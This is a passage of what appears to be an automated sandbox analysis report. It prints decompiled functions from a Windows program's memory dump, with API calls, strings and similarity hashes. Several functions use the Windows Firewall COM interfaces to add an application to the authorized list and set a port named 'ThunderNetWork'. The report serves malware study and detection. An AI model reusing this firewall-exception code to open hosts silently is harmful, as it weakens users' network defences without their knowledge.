Instruction Fuzzy Hash: 6C5118B5A01219AFCB01DFE5C888AAEBBBDEF8C705B144455F902EB251DB71AC45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0095323D, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0095323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x95dd18);
				E00953F70(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00952003(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x95c870;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x95f010;
				E00953C3D(_t35, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00953312();
				E00953C3D(_t35, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x95f618; // 0x95f540
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E00952EFA( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E00953FB5(E0095331B());
			}

0x0095323d
0x0095323d
0x0095323f
0x00953244
0x00953249
0x0095324f
0x00953257
0x0095325a
0x0095325f
0x00953260
0x00953263
0x00953266
0x00953270
0x00953275
0x0095327d
0x00953285
0x00953295
0x00953295
0x0095329b
0x0095329e
0x009532a5
0x009532ac
0x009532b5
0x009532bb
0x009532c2
0x009532c8
0x009532cf
0x009532d6
0x009532dc
0x009532df
0x009532e2
0x009532e7
0x009532e9
0x009532ee
0x009532ee
0x009532f4
0x009532fa
0x0095330b

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0095DD18,0000000C,00953378,00000000,00000000,?,00000000,?,009590BC,00000000,00010000,00030000,?,009584B4), ref: 0095324F
__crt_waiting_on_module_handle.LIBCMT ref: 0095325A

Part of subcall function 00952003: Sleep.KERNEL32(000003E8,00000000,?,009531A0,KERNEL32.DLL,?,009531EC,?,00000000,?,009590BC,00000000,00010000,00030000,?,009584B4), ref: 0095200F
Part of subcall function 00952003: GetModuleHandleW.KERNEL32(00000000,?,009531A0,KERNEL32.DLL,?,009531EC,?,00000000,?,009590BC,00000000,00010000,00030000,?,009584B4), ref: 00952018

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00953283
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00953293
__lock.LIBCMT ref: 009532B5
InterlockedIncrement.KERNEL32(?), ref: 009532C2
__lock.LIBCMT ref: 009532D6
___addlocaleref.LIBCMT ref: 009532F4

Strings

KERNEL32.DLL, xrefs: 00953249, 0095324E, 00953259
EncodePointer, xrefs: 00953277
DecodePointer, xrefs: 0095328B

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 79dbe18e0329c04fc4c20f7c568c34ac0fa866a8ba7fd94f5275c97a8d8b092a
Instruction ID: ebb1e57f076a8dddcf7c45789d6430ae3a09536b701e357818bdb585b169f242
Opcode Fuzzy Hash: 79dbe18e0329c04fc4c20f7c568c34ac0fa866a8ba7fd94f5275c97a8d8b092a
Instruction Fuzzy Hash: 3011A5B1804701DED720DF7BD806B4ABBE0AF41356F108519ECA997291CB74AA48DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00951191, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00951191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t67;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr _t80;
				intOrPtr* _t83;
				intOrPtr* _t85;
				char* _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				char* _t110;
				void* _t134;
				intOrPtr _t135;
				intOrPtr _t138;

				_t131 = __edx;
				_t134 = __eax;
				_v44 = 0;
				_t110 = 0x80004005;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v24 = E009580F0(__edx, _a4);
				_t67 = E009580F0(__edx, "ThunderNetWork");
				_v36 = _t67;
				_v28 = 0x100;
				__imp__#2(L"LAN");
				_v40 = _t67;
				E009580F0(__edx, _a8);
				_v32 = 0;
				if(E00951071(_t134,  &_v28,  &_v32) == 0) {
					_t135 = _v44;
				} else {
					_t80 = E009580F0(_t131, E00951C70(_t134, ":") + 1);
					_t138 = _t80;
					__imp__CoInitializeEx(0, 2);
					_t135 = _t80;
					if(_t135 == 0x80010106 || _t135 >= 0) {
						_t110 = E00951058( &_v20,  &_v20);
						if(_t110 >= 0) {
							_t83 = _v20;
							_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
							if(_t110 >= 0) {
								_t85 = _v20;
								_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
								if(_t110 >= 0) {
									if((_v12 & 0x00000004) != 0 && _v12 != 4) {
										_v12 = _v12 ^ 0x00000004;
									}
									_t87 =  &_v8;
									__imp__CoCreateInstance(0x95db2c, 0, 1, 0x95db3c, _t87);
									_t110 = _t87;
									if(_t110 >= 0) {
										_t88 = _v16;
										 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
										_t90 = _v8;
										 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
										_t92 = _v8;
										 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
										_t94 = _v8;
										 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
										_t96 = _v8;
										 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
										_t98 = _v8;
										 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
										_t100 = _v8;
										 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
										_t102 = _v8;
										 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
										_t104 = _v8;
										 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
										_t106 = _v8;
										 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
										_t108 = _v16;
										_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
									}
								}
							}
						}
					}
				}
				_t71 = _v8;
				if(_t71 != 0) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				_t72 = _v16;
				if(_t72 != 0) {
					 *((intOrPtr*)( *_t72 + 8))(_t72);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					 *((intOrPtr*)( *_t73 + 8))(_t73);
				}
				if(_t135 >= 0) {
					__imp__CoUninitialize();
				}
				return _t110;
			}

0x00951191
0x0095119f
0x009511a1
0x009511a4
0x009511a9
0x009511ac
0x009511af
0x009511b2
0x009511bf
0x009511c2
0x009511cc
0x009511cf
0x009511d6
0x009511df
0x009511e2
0x009511ea
0x009511f9
0x00951337
0x009511ff
0x0095120e
0x00951217
0x00951219
0x0095121f
0x00951227
0x0095123a
0x0095123f
0x00951245
0x00951252
0x00951256
0x0095125c
0x00951269
0x0095126d
0x00951277
0x0095127f
0x0095127f
0x00951283
0x00951295
0x0095129b
0x0095129f
0x009512a5
0x009512ae
0x009512b1
0x009512ba
0x009512bd
0x009512c6
0x009512c9
0x009512d2
0x009512d5
0x009512de
0x009512e4
0x009512ec
0x009512f2
0x009512fa
0x00951300
0x00951309
0x0095130f
0x00951316
0x00951319
0x00951321
0x00951327
0x00951333
0x00951333
0x0095129f
0x0095126d
0x00951256
0x0095123f
0x00951227
0x0095133a
0x0095133f
0x00951344
0x00951344
0x00951347
0x0095134c
0x00951351
0x00951351
0x00951354
0x00951359
0x0095135e
0x0095135e
0x00951363
0x00951365
0x00951365
0x00951371

APIs

_com_util::ConvertStringToBSTR.COMSUPP ref: 009511B5
_com_util::ConvertStringToBSTR.COMSUPP ref: 009511C2

Part of subcall function 009580F0: lstrlenA.KERNEL32(?,E3DA83E1,?,80004005,?,000000FE,?,00951112,00000000), ref: 00958137
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00951112,00000000), ref: 0095814D
Part of subcall function 009580F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00951112,00000000), ref: 0095815C
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00951112,00000000), ref: 009581EB
Part of subcall function 009580F0: GetLastError.KERNEL32(?,000000FE,?,00951112,00000000), ref: 00958206
Part of subcall function 009580F0: SysAllocString.OLEAUT32(00000000), ref: 00958221

SysAllocString.OLEAUT32(LAN), ref: 009511D6
_com_util::ConvertStringToBSTR.COMSUPP ref: 009511E2

Part of subcall function 009580F0: _malloc.LIBCMT ref: 009581A1

Part of subcall function 00951071: __wcstoui64.LIBCMT ref: 009510DB

_com_util::ConvertStringToBSTR.COMSUPP ref: 0095120E
CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00951219
CoCreateInstance.OLE32(0095DB2C,00000000,00000001,0095DB3C,?), ref: 00951295
CoUninitialize.OLE32(?), ref: 00951365

Strings

ThunderNetWork, xrefs: 009511BA
LAN, xrefs: 009511C7

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
String ID: LAN$ThunderNetWork
API String ID: 1199507461-1899760959
Opcode ID: 6c60f200bf34c04df7d5888ed02b81e57737e96a0b6523e6a1dbee9c2f4b550e
Instruction ID: f090d1c278cbcda81c30d5e28f0d5720ff7776b38a3ca6548a095f76ea78d353
Opcode Fuzzy Hash: 6c60f200bf34c04df7d5888ed02b81e57737e96a0b6523e6a1dbee9c2f4b550e
Instruction Fuzzy Hash: F0612A75A00309AFCB00DFE5C898BAE7BB9FF89315F1044A9F905EB291CB759945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00951567, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117
comCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00951567(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t38;
				char* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t51;
				intOrPtr* _t52;
				char* _t53;
				intOrPtr* _t54;
				char* _t55;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				intOrPtr* _t75;
				signed int _t78;

				_t74 = __edx;
				_t34 =  *0x95f008; // 0xe3da83e1
				_v12 = _t34 ^ _t78;
				_v48 = _a4;
				__imp__CoInitialize(0);
				_v44 = 0;
				_v36 = 0;
				_v40 = 0;
				_v32 = 0;
				_t38 = E009580F0(__edx, "HNetCfg.FwMgr");
				_t75 = __imp__CLSIDFromProgID;
				_t39 =  *_t75(_t38,  &_v28);
				_t76 = _t39;
				if(_t39 == 0) {
					_t51 =  &_v28;
					__imp__CoCreateInstance(_t51, 0, 5, 0x95c17c,  &_v44);
					_t76 = _t51;
					if(_t51 >= 0) {
						_t52 = _v44;
						_t74 =  &_v36;
						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
						_t76 = _t53;
						if(_t53 >= 0) {
							_t54 = _v36;
							_t74 =  &_v40;
							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
							_t76 = _t55;
							if(_t55 >= 0) {
								_t58 =  *_t75(E009580F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t76 = _t58;
								if(_t58 >= 0) {
									_t59 = _v40;
									_t74 =  &_v32;
									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
									_t76 = _t60;
									if(_t60 >= 0) {
										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E009580F0( &_v32, _v48));
									}
								}
							}
						}
					}
				}
				_t40 = _v32;
				if(_t40 != 0) {
					 *((intOrPtr*)( *_t40 + 8))(_t40);
				}
				_t41 = _v40;
				if(_t41 != 0) {
					 *((intOrPtr*)( *_t41 + 8))(_t41);
				}
				_t42 = _v36;
				if(_t42 != 0) {
					 *((intOrPtr*)( *_t42 + 8))(_t42);
				}
				_t43 = _v44;
				if(_t43 != 0) {
					 *((intOrPtr*)( *_t43 + 8))(_t43);
				}
				__imp__CoUninitialize();
				return E00951C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
			}

0x00951567
0x0095156d
0x00951574
0x00951580
0x00951583
0x00951592
0x00951595
0x00951598
0x0095159b
0x0095159e
0x009515a3
0x009515aa
0x009515ac
0x009515b0
0x009515c2
0x009515c6
0x009515cc
0x009515d0
0x009515d2
0x009515d7
0x009515dc
0x009515df
0x009515e3
0x009515e5
0x009515ea
0x009515ef
0x009515f2
0x009515f6
0x00951607
0x00951609
0x0095160d
0x0095160f
0x00951614
0x00951619
0x0095161c
0x00951620
0x00951636
0x00951636
0x00951620
0x0095160d
0x009515f6
0x009515e3
0x009515d0
0x00951638
0x0095163d
0x00951642
0x00951642
0x00951645
0x0095164a
0x0095164f
0x0095164f
0x00951652
0x00951657
0x0095165c
0x0095165c
0x0095165f
0x00951664
0x00951669
0x00951669
0x0095166c
0x00951682

APIs

CoInitialize.OLE32(00000000), ref: 00951583
_com_util::ConvertStringToBSTR.COMSUPP ref: 0095159E
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009515AA
CoCreateInstance.OLE32(?,00000000,00000005,0095C17C,?), ref: 009515C6
_com_util::ConvertStringToBSTR.COMSUPP ref: 00951601

Part of subcall function 009580F0: lstrlenA.KERNEL32(?,E3DA83E1,?,80004005,?,000000FE,?,00951112,00000000), ref: 00958137
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00951112,00000000), ref: 0095814D
Part of subcall function 009580F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00951112,00000000), ref: 0095815C
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00951112,00000000), ref: 009581EB
Part of subcall function 009580F0: GetLastError.KERNEL32(?,000000FE,?,00951112,00000000), ref: 00958206
Part of subcall function 009580F0: SysAllocString.OLEAUT32(00000000), ref: 00958221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00951607
_com_util::ConvertStringToBSTR.COMSUPP ref: 0095162A

Part of subcall function 009580F0: _malloc.LIBCMT ref: 009581A1

CoUninitialize.OLE32 ref: 0095166C

Strings

HNetCfg.FwAuthorizedApplication, xrefs: 009515FC
HNetCfg.FwMgr, xrefs: 0095158D

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 4188526640-1951265404
Opcode ID: eeeb6f2919618fb5719cca617e580326e8b74e7b27ed7062f1dfbc48c4c55f54
Instruction ID: c7800467cb02cbcad80f1a187e8fef7e310bd30dd7b9030d868e755c9d8aef58
Opcode Fuzzy Hash: eeeb6f2919618fb5719cca617e580326e8b74e7b27ed7062f1dfbc48c4c55f54
Instruction Fuzzy Hash: 65413DB1D002199FCB10EFA5C8889EEB7FDEF88315B594968E901F7251DB359C498B60

Uniqueness

Uniqueness Score: -1.00%

Function 00951683, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127
comCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00951683(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t43;
				char* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				char* _t56;
				intOrPtr* _t57;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				char* _t63;
				intOrPtr* _t64;
				char* _t65;
				intOrPtr* _t68;
				char _t83;
				signed int _t86;

				_t82 = __edx;
				_t39 =  *0x95f008; // 0xe3da83e1
				_v12 = _t39 ^ _t86;
				_t83 = 0;
				_v56 = _a4;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t43 = E009580F0(__edx, "HNetCfg.FwMgr");
				_t85 = __imp__CLSIDFromProgID;
				_t44 =  *_t85(_t43,  &_v28);
				_t70 = _t44;
				if(_t44 == 0) {
					_t56 =  &_v28;
					__imp__CoCreateInstance(_t56, 0, 5, 0x95c17c,  &_v32);
					_t70 = _t56;
					if(_t56 >= 0) {
						_t57 = _v32;
						_t82 =  &_v44;
						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
						_t70 = _t58;
						if(_t58 >= 0) {
							_t59 = _v44;
							_t82 =  &_v40;
							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
							_t70 = _t60;
							if(_t60 >= 0) {
								_t63 =  *_t85(E009580F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t70 = _t63;
								if(_t63 >= 0) {
									_t64 = _v40;
									_t82 =  &_v36;
									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
									_t70 = _t65;
									if(_t65 >= 0) {
										_v52 = 0;
										_t85 =  &_v48;
										_v48 = 0x100;
										if(E00951071(_v56,  &_v48,  &_v52) != 0) {
											_t68 = _v36;
											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
										}
										_t83 = 0;
									}
								}
							}
						}
					}
				}
				_t45 = _v36;
				if(_t45 != _t83) {
					 *((intOrPtr*)( *_t45 + 8))(_t45);
				}
				_t46 = _v40;
				if(_t46 != _t83) {
					 *((intOrPtr*)( *_t46 + 8))(_t46);
				}
				_t47 = _v44;
				if(_t47 != _t83) {
					 *((intOrPtr*)( *_t47 + 8))(_t47);
				}
				_t48 = _v32;
				if(_t48 != _t83) {
					 *((intOrPtr*)( *_t48 + 8))(_t48);
				}
				__imp__CoUninitialize();
				return E00951C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
			}

0x00951683
0x00951689
0x00951690
0x00951699
0x0095169c
0x0095169f
0x009516ae
0x009516b1
0x009516b4
0x009516b7
0x009516ba
0x009516bf
0x009516c6
0x009516c8
0x009516cc
0x009516de
0x009516e2
0x009516e8
0x009516ec
0x009516f2
0x009516f7
0x009516fc
0x009516ff
0x00951703
0x00951705
0x0095170a
0x0095170f
0x00951712
0x00951716
0x00951727
0x00951729
0x0095172d
0x0095172f
0x00951734
0x00951739
0x0095173c
0x00951740
0x00951745
0x0095174c
0x0095174f
0x0095175e
0x00951763
0x0095176f
0x0095176f
0x00951771
0x00951771
0x00951740
0x0095172d
0x00951716
0x00951703
0x009516ec
0x00951773
0x00951778
0x0095177d
0x0095177d
0x00951780
0x00951785
0x0095178a
0x0095178a
0x0095178d
0x00951792
0x00951797
0x00951797
0x0095179a
0x0095179f
0x009517a4
0x009517a4
0x009517a7
0x009517bd

APIs

CoInitialize.OLE32(00000000), ref: 0095169F
_com_util::ConvertStringToBSTR.COMSUPP ref: 009516BA
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009516C6
CoCreateInstance.OLE32(?,00000000,00000005,0095C17C,?), ref: 009516E2
_com_util::ConvertStringToBSTR.COMSUPP ref: 00951721

Part of subcall function 009580F0: lstrlenA.KERNEL32(?,E3DA83E1,?,80004005,?,000000FE,?,00951112,00000000), ref: 00958137
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00951112,00000000), ref: 0095814D
Part of subcall function 009580F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00951112,00000000), ref: 0095815C
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00951112,00000000), ref: 009581EB
Part of subcall function 009580F0: GetLastError.KERNEL32(?,000000FE,?,00951112,00000000), ref: 00958206
Part of subcall function 009580F0: SysAllocString.OLEAUT32(00000000), ref: 00958221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00951727

Part of subcall function 00951071: __wcstoui64.LIBCMT ref: 009510DB

CoUninitialize.OLE32 ref: 009517A7

Strings

HNetCfg.FwAuthorizedApplication, xrefs: 0095171C
HNetCfg.FwMgr, xrefs: 009516A9

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 1827900861-1951265404
Opcode ID: ec3de00a07c105328a11b5e1242d0adf7bdd7e7d01f864b7e4c719905acd18ca
Instruction ID: 6d09bfbf1ca21e04408d92e1acde7bc9b392c5aa3c663487063fac88bbf62b31
Opcode Fuzzy Hash: ec3de00a07c105328a11b5e1242d0adf7bdd7e7d01f864b7e4c719905acd18ca
Instruction Fuzzy Hash: 6B41EC75A04608AFCB00DFE9C888DEEB7F9EF8C716B244455E901E7251D7759845CF60

Uniqueness

Uniqueness Score: -1.00%

Function 009528F4, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E009528F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x95dcb8);
				E00953F70(__ebx, __edi, __esi);
				_t31 = E0095339D(__ebx, __edi, _t35);
				_t15 =  *0x95f534; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00953C3D(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x95f438; // 0x2341658
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x95f010;
								if(__eflags != 0) {
									_push(_t33);
									E009554A0(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x95f438; // 0x2341658
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x95f438; // 0x2341658
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0095298F();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00952033(_t29, _t31, 0x20);
				}
				return E00953FB5(_t33);
			}

0x009528f4
0x009528f4
0x009528f4
0x009528f4
0x009528f6
0x009528fb
0x00952905
0x00952907
0x0095290f
0x00952930
0x00952936
0x0095293a
0x0095293d
0x00952940
0x00952946
0x00952948
0x0095294a
0x0095294d
0x00952953
0x00952955
0x00952957
0x0095295d
0x0095295f
0x00952960
0x00952965
0x0095295d
0x00952955
0x00952966
0x0095296b
0x0095296e
0x00952974
0x00952978
0x00952978
0x0095297e
0x00952985
0x00952917
0x00952917
0x00952917
0x0095291c
0x00952920
0x00952925
0x0095292d

APIs

__getptd.LIBCMT ref: 00952900

Part of subcall function 0095339D: __getptd_noexit.LIBCMT ref: 009533A0
Part of subcall function 0095339D: __amsg_exit.LIBCMT ref: 009533AD

__amsg_exit.LIBCMT ref: 00952920
__lock.LIBCMT ref: 00952930
InterlockedDecrement.KERNEL32(?), ref: 0095294D
InterlockedIncrement.KERNEL32(02341658), ref: 00952978

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: c86c906ceb9a64f8500052ef30c17718878bcef237cde1761505b377a991ef10
Instruction ID: d84ba5ce9acee0e571c5855943b45900395ab04a25a3c41650d75cc5f3969b00
Opcode Fuzzy Hash: c86c906ceb9a64f8500052ef30c17718878bcef237cde1761505b377a991ef10
Instruction Fuzzy Hash: 2201E132D017119BC721EF2BA55975EB3A4BF417A3F040014EC40732D0C7386A89DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 009554A0, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E009554A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x95de48);
				_t8 = E00953F70(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00953FB5(_t8);
				}
				if( *0x960a98 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x96093c, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E009538CA(_t32);
						 *_t10 = E00953888(GetLastError());
					}
					goto L9;
				}
				E00953C3D(__ebx, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00956520(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00956550();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E009554F6();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
